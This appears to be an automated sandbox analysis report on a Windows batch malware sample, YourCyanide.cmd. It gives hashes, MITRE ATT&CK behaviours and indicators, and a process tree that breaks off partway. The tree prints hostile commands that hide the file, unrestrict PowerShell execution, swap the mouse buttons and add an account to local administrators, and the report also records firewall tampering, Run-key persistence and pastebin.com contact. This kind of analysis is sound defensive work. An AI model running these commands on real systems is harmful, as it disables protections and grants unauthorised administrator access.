1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62

Resubmissions

15-11-2024 12:51

241115-p3ywnsthmh 9

18-05-2022 00:35

220518-axmh5abbc9 10

18-05-2022 00:32

220518-avncmsbbb7 10

Analysis

max time kernel
35s
max time network
101s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
15-11-2024 12:51

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

YourCyanide.cmd
Size

90KB
MD5

4cb725f17bec289507f9e8249c8ea80e
SHA1

a7034e84cb884bf90e61ce3b621424bec57334ae
SHA256

1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
SHA512

776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
SSDEEP

1536:myOIprQ75GiWVIHp/gyaNFCygr8dcW7HO2mVd75lQCgyUqG8cA4eD1yXHn/Wjvur:myOIp1

Score

9^/10

discovery evasion execution persistence privilege_escalation

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 1748 powershell.exe

flow	pid	process
2	1748	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2476	powershell.exe
3620	powershell.exe
3652	powershell.exe
2000	powershell.exe
4056	powershell.exe
4760	powershell.exe
4336	powershell.exe
1748	powershell.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 64 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
1640	netsh.exe
1632	netsh.exe
3944	netsh.exe
4988	netsh.exe
1168	netsh.exe
2280	netsh.exe
2956	netsh.exe
1420	netsh.exe
1488	netsh.exe
916	netsh.exe
4196	netsh.exe
3676	netsh.exe
4264	netsh.exe
2796	netsh.exe
4476	netsh.exe
4176	netsh.exe
4200	netsh.exe
2584	netsh.exe
916	netsh.exe
1664	netsh.exe
2844	netsh.exe
1384	netsh.exe
2332	netsh.exe
4348	netsh.exe
4024	netsh.exe
1668	netsh.exe
4404	netsh.exe
1732	netsh.exe
3156	netsh.exe
3788	netsh.exe
1588	netsh.exe
1108	netsh.exe
3588	netsh.exe
3588	netsh.exe
1168	netsh.exe
4156	netsh.exe
3436	netsh.exe
2632	netsh.exe
4024	netsh.exe
2700	netsh.exe
2024	netsh.exe
2188	netsh.exe
3532	netsh.exe
3196	netsh.exe
3640	netsh.exe
4400	netsh.exe
4884	netsh.exe
1732	netsh.exe
3312	netsh.exe
3944	netsh.exe
1876	netsh.exe
2368	netsh.exe
3456	netsh.exe
260	netsh.exe
1068	netsh.exe
3688	netsh.exe
2720	netsh.exe
4756	netsh.exe
260	netsh.exe
4440	netsh.exe
4276	netsh.exe
4848	netsh.exe
2796	netsh.exe
3456	netsh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_17507_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 pastebin.com
2 pastebin.com
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Drops file in Windows directory 2 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\win.ini cmd.exe
File opened for modification C:\Windows\system.ini cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
1	pastebin.com
2	pastebin.com

description	ioc	process
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001
System Time Discovery 1 TTPs 6 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
discovery

System Time Discovery
T1124

Processes:

net1.exenet.exenet1.exenet.exenet1.exenet.exe

pid process

4092 net1.exe
840 net.exe
1488 net1.exe
3116 net.exe
1176 net1.exe
3216 net.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4848 taskkill.exe

pid	process
4092	net1.exe
840	net.exe
1488	net1.exe
3116	net.exe
1176	net1.exe
3216	net.exe

pid	process
4848	taskkill.exe

Modifies registry class 46 IoCs

Processes:

powershell.exepowershell.execmd.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	powershell.exe
Key created	\Registry\User\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\NotificationData	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	powershell.exe

NTFS ADS 3 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24	cmd.exe
File opened for modification	C:\Users\Admin\%ONRsX:~13	cmd.exe
File opened for modification	C:\Users\Admin\%onRsx:~13	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

Processes:

powershell.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2476	powershell.exe
2476	powershell.exe
2476	powershell.exe
4424	tskill.exe
4424	tskill.exe
3676	tskill.exe
3676	tskill.exe
2156	tskill.exe
2156	tskill.exe
4132	tskill.exe
4132	tskill.exe
2332	tskill.exe
2332	tskill.exe
1932	tskill.exe
1932	tskill.exe
1516	tskill.exe
1516	tskill.exe
1224	tskill.exe
1224	tskill.exe
1160	tskill.exe
1160	tskill.exe
3764	tskill.exe
3764	tskill.exe
1996	tskill.exe
1996	tskill.exe
4936	tskill.exe
4936	tskill.exe
4904	tskill.exe
4904	tskill.exe
1748	powershell.exe
1748	powershell.exe
1748	powershell.exe
3620	powershell.exe
3620	powershell.exe
3652	powershell.exe
3652	powershell.exe
2000	powershell.exe
2000	powershell.exe
3620	powershell.exe
4056	powershell.exe
4056	powershell.exe
4056	powershell.exe
2000	powershell.exe
3652	powershell.exe
3620	powershell.exe
4056	powershell.exe
2000	powershell.exe
3652	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4336	powershell.exe
4336	powershell.exe
4336	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

4760 powershell.exe
4336 powershell.exe

pid	process
4760	powershell.exe
4336	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.execmd.execmd.exenet.exenet.exenet.exe

description	pid	process	target process
PID 4896 wrote to memory of 1420	4896	cmd.exe	attrib.exe
PID 4896 wrote to memory of 1420	4896	cmd.exe	attrib.exe
PID 4896 wrote to memory of 5088	4896	cmd.exe	rundll32.exe
PID 4896 wrote to memory of 5088	4896	cmd.exe	rundll32.exe
PID 4896 wrote to memory of 2288	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 2288	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 3680	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 3680	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 1644	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 1644	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 2972	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 2972	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 4224	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 4224	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 2476	4896	cmd.exe	powershell.exe
PID 4896 wrote to memory of 2476	4896	cmd.exe	powershell.exe
PID 4896 wrote to memory of 4672	4896	cmd.exe	net.exe
PID 4896 wrote to memory of 4672	4896	cmd.exe	net.exe
PID 4672 wrote to memory of 756	4672	net.exe	net1.exe
PID 4672 wrote to memory of 756	4672	net.exe	net1.exe
PID 4896 wrote to memory of 3852	4896	cmd.exe	reg.exe
PID 4896 wrote to memory of 3852	4896	cmd.exe	reg.exe
PID 4896 wrote to memory of 4432	4896	cmd.exe	reg.exe
PID 4896 wrote to memory of 4432	4896	cmd.exe	reg.exe
PID 4896 wrote to memory of 2472	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 2472	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 2124	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 2124	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 3180	4896	cmd.exe	net.exe
PID 4896 wrote to memory of 3180	4896	cmd.exe	net.exe
PID 3180 wrote to memory of 4900	3180	net.exe	net1.exe
PID 3180 wrote to memory of 4900	3180	net.exe	net1.exe
PID 2472 wrote to memory of 1996	2472	cmd.exe	scrnsave.scr
PID 2472 wrote to memory of 1996	2472	cmd.exe	scrnsave.scr
PID 4896 wrote to memory of 4848	4896	cmd.exe	taskkill.exe
PID 4896 wrote to memory of 4848	4896	cmd.exe	taskkill.exe
PID 2124 wrote to memory of 2572	2124	cmd.exe	scrnsave.scr
PID 2124 wrote to memory of 2572	2124	cmd.exe	scrnsave.scr
PID 2472 wrote to memory of 1576	2472	cmd.exe	scrnsave.scr
PID 2472 wrote to memory of 1576	2472	cmd.exe	scrnsave.scr
PID 2124 wrote to memory of 3980	2124	cmd.exe	scrnsave.scr
PID 2124 wrote to memory of 3980	2124	cmd.exe	scrnsave.scr
PID 4896 wrote to memory of 1816	4896	cmd.exe	net.exe
PID 4896 wrote to memory of 1816	4896	cmd.exe	net.exe
PID 2472 wrote to memory of 1072	2472	cmd.exe	scrnsave.scr
PID 2472 wrote to memory of 1072	2472	cmd.exe	scrnsave.scr
PID 1816 wrote to memory of 2832	1816	net.exe	scrnsave.scr
PID 1816 wrote to memory of 2832	1816	net.exe	scrnsave.scr
PID 4896 wrote to memory of 3624	4896	cmd.exe	net.exe
PID 4896 wrote to memory of 3624	4896	cmd.exe	net.exe
PID 2124 wrote to memory of 3996	2124	cmd.exe	scrnsave.scr
PID 2124 wrote to memory of 3996	2124	cmd.exe	scrnsave.scr
PID 3624 wrote to memory of 4980	3624	net.exe	net.exe
PID 3624 wrote to memory of 4980	3624	net.exe	net.exe
PID 2472 wrote to memory of 2672	2472	cmd.exe	net1.exe
PID 2472 wrote to memory of 2672	2472	cmd.exe	net1.exe
PID 4896 wrote to memory of 444	4896	cmd.exe	net.exe
PID 4896 wrote to memory of 444	4896	cmd.exe	net.exe
PID 444 wrote to memory of 1868	444	net.exe	scrnsave.scr
PID 444 wrote to memory of 1868	444	net.exe	scrnsave.scr
PID 2124 wrote to memory of 2828	2124	cmd.exe	scrnsave.scr
PID 2124 wrote to memory of 2828	2124	cmd.exe	scrnsave.scr
PID 4896 wrote to memory of 4056	4896	cmd.exe	net1.exe
PID 4896 wrote to memory of 4056	4896	cmd.exe	net1.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1420 attrib.exe

pid	process
1420	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"
1⤵
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd
  2⤵
  - Views/modifies file attributes
  PID:1420
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:5088
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2288
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3680
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2972
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:4224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Set-ExecutionPolicy Unrestricted"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2476
- C:\Windows\system32\net.exe
  net localgroup administrators session /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:756
- C:\Windows\system32\reg.exe
